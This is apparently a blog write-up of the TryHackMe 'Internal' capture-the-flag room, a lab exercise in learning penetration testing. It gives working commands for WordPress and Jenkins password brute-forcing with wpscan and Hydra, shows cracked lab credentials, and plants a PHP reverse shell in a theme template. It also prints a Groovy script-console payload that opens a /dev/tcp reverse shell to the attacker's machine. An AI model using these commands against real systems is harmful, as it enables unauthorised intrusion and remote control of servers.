TryHackMe: Internal

tryhackme Internal write-up

  • Name: Internal
  • Description: Penetration Testing Challenge
  • Room: tryhackme.com
  • Difficulty: Hard

Services enumeration

Let’s use Nmap to enumerate the services. We discover two ports:

command : nmap -sC -sV <Machine-IP>

Services enumeration with nmap

Web enumeration

We scan directories with gobuster

In the hosts file, add http: //internal.thm

command: vi /etc/hosts

<Machine-IP> http://internal.thm

Next

command: gobuster dir -u http://internal.thm -w /usr/share/wordlists/dirb/common.txt

Wordpress enumeration

We can confirm our assumption that this is a Wordpress blog by browsing /blog. Let’s enumerate the users using wpscan:

command: wpscan — url http://internal.thm/blog -e u

WPScan indicates that the only user is admin. Using WPScan’s bruteforce feature, let’s try bruteforcing the password:

command: wpscan — url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt

After a few minutes we find the password…

With admin:my2boys, we are able to log in (http://internal.thm/blog/wp-admin/) and modify the templates PHP source code. It will be convenient to write a reverse shell this way.

Navigate to “Appearance > Theme Editor > 404.php” and replace the PHP reverse shell (http://pentestmonkey.net/tools/web-shells/php-reverse-shell).

Create a listener using nc

command: nc -nlvp 4321

The reverse shell file should contain your IP and port

After uploading, call the template (http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php).

A file in the /opt directory is of interest:

Let’s login with the user aubreanna

command: ssh aubreanna@<Machine-IP>

User flag

The user flag is in aubreanna home folder

Root Flag

Check privileges…

We will need privilege escalation to read the root flag. Aubreanna is not on the sudoers list.

A file in aubreanna’s home folder tells us Jenkins runs on port 8080:

As you can see, there’s a docker running on target machine with 172 series IP address, so Jenkins is inside docker running on port 8080. Even if we try to access that docker IP and Port using our browser it’s not reachable. So, to access it we are going to use SSH tunneling technique to forward Jenkins ip:port to our attacker machine’s ip:port.

command: ssh -L 8080:172.17.0.2:8080 aubreanna@internal.thm

Jenkins can be accessed by typing localhost:8080 into your browser.

Jenkins requires credentials to be accessed. Even the regular passwords, such as admin:admin or admin:password, won’t work. A brute-force attack must be used, such as Hydra.

To do that, intercept the POST request in BurpSuite to build our hydra attack.

When information is incorrect, we receive this message: “Invalid username or password”

We now have all the required information. Here is the hydra attack:

Then enter the following command in hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt internal.thm -s 8080 http-post-form “/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password”

After a few minutes, we encounter the following message

[8080][http-post-form] host: internal.thm login: admin password: spongebob

Now that we have an admin access to Jenkins, we can run commands, and we’ll ultimately exploit this to have a reverse shell.

Reverse shell in docker

Run a listener (on your machine):

command: nc -nlvp 1234

Click the “Script Console” menu item in Jenkins by going to “Jenkins > Nodes > master”.

Run the following command:

r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/<Your-IP>/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor()

And when we run…

another method

Use “Shellkins”

  • Clone this repository
$ git clone https://github.com/HSNHK/Shellkins.git
  • Run a listener (on your machine)
$ nc -nlvp 1234

Run the script

$ python3 shellkins.py --host http://example.com:8080/ --user admin --pass admin --lhost 127.0.0.1 --lport 1234
https://github.com/HSNHK/Shellkins

Root password

root password

Back to our initial SSH connection as aubreanna

To get the root flag

root flag

thank you 🌏🔥

--

--

--

Computer student and interested in programming and security

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Network Fundamentals — Protocols

Ever since I was a little boy, I have only ever wanted to be a Doctor.

Our Headless CMS Journey To Kentico Cloud

Testing Cassandra Throughput Performance ( Part 3 of 3)

Declare Flutter Final!

How To Run Docker Compose with Testcontainers

Machine Learning Model Deployment as APIs (flask)

When and Where to Use Pointers in Go

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Hassan Mohammadi

Hassan Mohammadi

Computer student and interested in programming and security

More from Medium

Tryhackme | Nmap

TryHackMe walkthrough — Hydra

Tryhackme Easy Peasy Walkthrough

HTB-Frolic Writeup